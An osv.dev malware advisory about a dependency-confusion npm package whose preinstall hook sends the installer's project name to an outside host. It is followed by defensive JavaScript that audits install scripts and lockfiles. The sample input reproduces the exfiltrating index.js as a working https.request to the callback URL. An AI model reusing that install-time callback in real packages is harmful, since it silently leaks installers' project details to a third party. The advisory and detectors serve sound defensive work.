nativescript-swisspost-imagepicker@52.31.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-5792
Ecosystem
npm
Summary
package.json declares preinstall: node index.js, so index.js runs during npm install, before the package is ever required by application code and before any post-install review could catch it. index.js reads process.env.INIT_CWD (which npm sets to the directory npm was invoked from, i.e. the installing project's working directory), takes its basename, and POSTs a JSON payload {pkg, timestamp, transport, project} to the hardcoded URL https://deepbounty.dd06-dev.fr/cb/d27071f6-8aa6-43b9-98be-0caf9803fba5. The package name nativescript-swisspost-imagepicker, the package description ("Security PoC for Bug Bounty") and the comment "Harmless dependency confusion PoC" in index.js identify this as a dependency-confusion squat targeting an internal Swiss Post NativeScript namespace: a public package published under a name that an internal build expects to resolve from a private registry. Any install that resolves the name from the public registry silently sends the installer's project name to a third-party endpoint. That confirms to the operator of deepbounty.dd06-dev.fr that the private package name exists and is in use, and over time gives that operator a directory of organizations whose builds resolved the public package. The author's self-labelling as a bug-bounty PoC does not change the installer-side impact: unsolicited install-time outbound network traffic carrying installer-side identifiers to an attacker-controlled host. Running npm install with --ignore-scripts stops the hook from executing but still places the squatted package in node_modules; the durable defence for internal names is to make the private registry the only source for them (a scoped name bound to a scope-specific registry, and a lockfile whose resolved URLs are checked in CI) and to treat public resolution of an internal name as a build failure.
Source: amazon-inspector (b2271ce1525f722f302ee59b9de3270020e6d1aa84d74cc2972cb6ffa34d9a62)
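As an added example, the two checks a practitioner would run over a dependency tree for the pattern this report describes: an install-time audit that flags a manifest with an install hook whose script reads INIT_CWD and sends to a hardcoded URL, and a lockfile check that flags internal-looking names resolved from the public registry. This is not code from the package, from osv.dev or from Amazon Inspector; the sample package.json, index.js and package-lock.json it runs on are constructed stand-ins modelled on the report's description, not the real files, and the "nativescript-swisspost-" prefix is an assumed internal naming convention.

```javascript
// Added example: install-script audit and dependency-confusion lockfile check.
// Not code from the package or the scanners; all sample inputs are constructed.

// npm lifecycle hooks that run at install time without the user calling them.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

const PATTERNS = {
  // installer's working directory (npm sets INIT_CWD to where npm was invoked)
  initCwd: /process\.env\.INIT_CWD\b/,
  // any hardcoded URL; the report's package POSTs to one
  hardcodedUrl: /https?:\/\/[^\s"'`)]+/g,
  // common outbound network primitives in Node
  network: /\b(https?\.(request|get)|fetch|XMLHttpRequest|net\.connect|dns\.)/,
};

// Return the install-time hooks a manifest declares, with their commands.
function lifecycleScripts(pkg) {
  const scripts = pkg.scripts || {};
  return INSTALL_HOOKS.filter((h) => typeof scripts[h] === "string")
    .map((h) => ({ hook: h, command: scripts[h] }));
}

// Audit one package: its manifest plus the source of whatever its hook runs.
// "block" = install hook + hardcoded URL + network call (the report's pattern),
// "review" = any single indicator, "ok" = nothing found.
function auditInstallScript(pkg, source) {
  const hooks = lifecycleScripts(pkg);
  const urls = source.match(PATTERNS.hardcodedUrl) || [];
  const network = PATTERNS.network.test(source);
  const findings = hooks.map((h) => `install hook ${h.hook}: "${h.command}"`);
  if (PATTERNS.initCwd.test(source)) findings.push("reads process.env.INIT_CWD (installing project's directory)");
  for (const u of urls) findings.push(`hardcoded URL: ${u}`);
  if (network) findings.push("outbound network call in install-time code");
  let severity = findings.length ? "review" : "ok";
  if (hooks.length && urls.length && network) severity = "block";
  return { name: pkg.name, severity, hooks, urls, findings };
}

// Dependency-confusion check over package-lock.json (lockfileVersion 2 or 3):
// a package whose name matches an internal naming prefix but whose "resolved"
// field points at the public registry was served from the wrong source.
function publicResolutionsForInternalNames(lock, internalPrefixes, publicRegistry = "https://registry.npmjs.org/") {
  const hits = [];
  const marker = "node_modules/";
  for (const [key, entry] of Object.entries(lock.packages || {})) {
    if (key === "") continue; // "" is the root project itself, not a dependency
    const name = key.slice(key.lastIndexOf(marker) + marker.length); // handles nested and @scoped keys
    const internal = internalPrefixes.some((prefix) => name.startsWith(prefix));
    if (internal && typeof entry.resolved === "string" && entry.resolved.startsWith(publicRegistry)) {
      hits.push({ name, version: entry.version, resolved: entry.resolved });
    }
  }
  return hits;
}

// --- constructed sample inputs, modelled on the report's description ---
const samplePkg = {
  name: "nativescript-swisspost-imagepicker",
  version: "52.31.0",
  description: "Security PoC for Bug Bounty",
  scripts: { preinstall: "node index.js" },
};
const sampleIndexJs = `
// Harmless dependency confusion PoC  (constructed stand-in for the real index.js)
const https = require("https");
const project = require("path").basename(process.env.INIT_CWD || "");
const body = JSON.stringify({ pkg: "nativescript-swisspost-imagepicker", timestamp: Date.now(), transport: "https", project });
https.request("https://deepbounty.dd06-dev.fr/cb/d27071f6-8aa6-43b9-98be-0caf9803fba5", { method: "POST" }).end(body);
`;
const sampleLock = {
  lockfileVersion: 3,
  packages: {
    "": { name: "internal-app", version: "1.0.0" },
    "node_modules/nativescript-swisspost-imagepicker": {
      version: "52.31.0",
      resolved: "https://registry.npmjs.org/nativescript-swisspost-imagepicker/-/nativescript-swisspost-imagepicker-52.31.0.tgz",
    },
    "node_modules/left-pad": { version: "1.3.0", resolved: "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz" },
  },
};

console.log(auditInstallScript(samplePkg, sampleIndexJs));
console.log(publicResolutionsForInternalNames(sampleLock, ["nativescript-swisspost-"]));
```

In a real pipeline the audit walks node_modules, parses each package.json and reads the file its hook command references rather than a string literal; the regexes are heuristics that catch the plain form described here and will miss obfuscated or string-built URLs, so treat "review" as a prompt to read the script, not as a clean bill of health. The lockfile check is the one that stops this class of package regardless of how the install script is written: if an internal name ever resolves to the public registry, fail the build.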